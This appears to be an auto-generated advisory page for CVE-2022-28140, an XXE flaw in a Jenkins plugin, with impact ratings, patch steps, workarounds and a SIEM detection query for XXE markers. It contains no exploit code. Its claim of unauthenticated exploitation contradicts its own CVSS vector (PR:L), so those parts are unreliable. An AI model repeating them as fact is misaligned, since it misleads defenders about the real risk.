CVE-2022-28140 – The Jenkins Flaky Test Handler Plugin 1.2.1 and... (How to Fix)

Q: What is the severity of CVE-2022-28140?

CVE-2022-28140 has a CVSS score of 8.1 (HIGH). The Jenkins Flaky Test Handler Plugin 1.2.1 and earlier contains an XML external entity (XXE) vulnerability due to improper XML parser configuration. This allows attackers to read arbitrary files from the Jenkins controller file system and potentially perform server-side request forgery (SSRF). All Jenkins instances using the vulnerable plugin versions are affected.

📋 TL;DR

The Jenkins Flaky Test Handler Plugin 1.2.1 and earlier contains an XML external entity (XXE) vulnerability due to improper XML parser configuration. This allows attackers to read arbitrary files from the Jenkins controller file system and potentially perform server-side request forgery (SSRF). All Jenkins instances using the vulnerable plugin versions are affected.

💻 Affected Systems

Products:

Jenkins Flaky Test Handler Plugin

Versions: 1.2.1 and earlier

Operating Systems: All platforms running Jenkins

Default Config Vulnerable: ⚠️ Yes

Notes: All Jenkins instances with the vulnerable plugin installed are affected regardless of configuration.

📦 What is this software?

Flaky Test Handler by Jenkins

View all CVEs affecting Flaky Test Handler →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could read sensitive files from the Jenkins controller (including credentials, configuration files, and secrets), perform SSRF attacks against internal systems, and potentially achieve remote code execution through file inclusion.

🟠

Likely Case

Unauthenticated attackers reading arbitrary files from the Jenkins controller file system, potentially exposing credentials, configuration data, and other sensitive information.

🟢

If Mitigated

Limited impact with proper network segmentation and file system permissions, though file reading capabilities would still be possible.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

XXE vulnerabilities are well-understood with readily available exploitation techniques. The advisory includes technical details that could facilitate exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.2.2

Vendor Advisory: https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1896

Restart Required: Yes

Instructions:

1. Update Jenkins Flaky Test Handler Plugin to version 1.2.2 or later
2. Navigate to Manage Jenkins > Manage Plugins > Available
3. Search for 'Flaky Test Handler Plugin'
4. Install the updated version
5. Restart Jenkins after installation

🔧 Temporary Workarounds

Disable vulnerable plugin

all

Temporarily disable the Flaky Test Handler Plugin if immediate patching is not possible

Navigate to Manage Jenkins > Manage Plugins > Installed
Find 'Flaky Test Handler Plugin'
Click 'Disable'

🧯 If You Can't Patch

Remove the Flaky Test Handler Plugin entirely from Jenkins
Implement strict network segmentation to isolate Jenkins from sensitive internal systems

🔍 How to Verify

Check if Vulnerable:

Check plugin version in Jenkins: Manage Jenkins > Manage Plugins > Installed > Flaky Test Handler Plugin

Check Version:

Check Jenkins plugin directory or use Jenkins CLI: java -jar jenkins-cli.jar -s http://jenkins-url/ list-plugins | grep 'Flaky Test Handler'

Verify Fix Applied:

Verify plugin version is 1.2.2 or later in the Installed Plugins list

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors in Jenkins logs
Multiple failed authentication attempts followed by XML processing
File read operations from unexpected locations

Network Indicators:

HTTP requests containing XML with external entity references to the Jenkins instance
Outbound connections from Jenkins to internal systems not normally accessed

SIEM Query:

source="jenkins.log" AND ("XXE" OR "external entity" OR "DOCTYPE" OR "SYSTEM")

📊 Metadata

CVE ID: CVE-2022-28140

CVSS v3 Score: 8.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CWE: CWE-611

Published: March 29, 2022

Last Updated: November 21, 2024

🔗 References

http://www.openwall.com/lists/oss-security/2022/03/29/1 Mailing List,Third Party Advisory
https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1896 Vendor Advisory
http://www.openwall.com/lists/oss-security/2022/03/29/1 Mailing List,Third Party Advisory
https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1896 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-28140, you might also want to check these: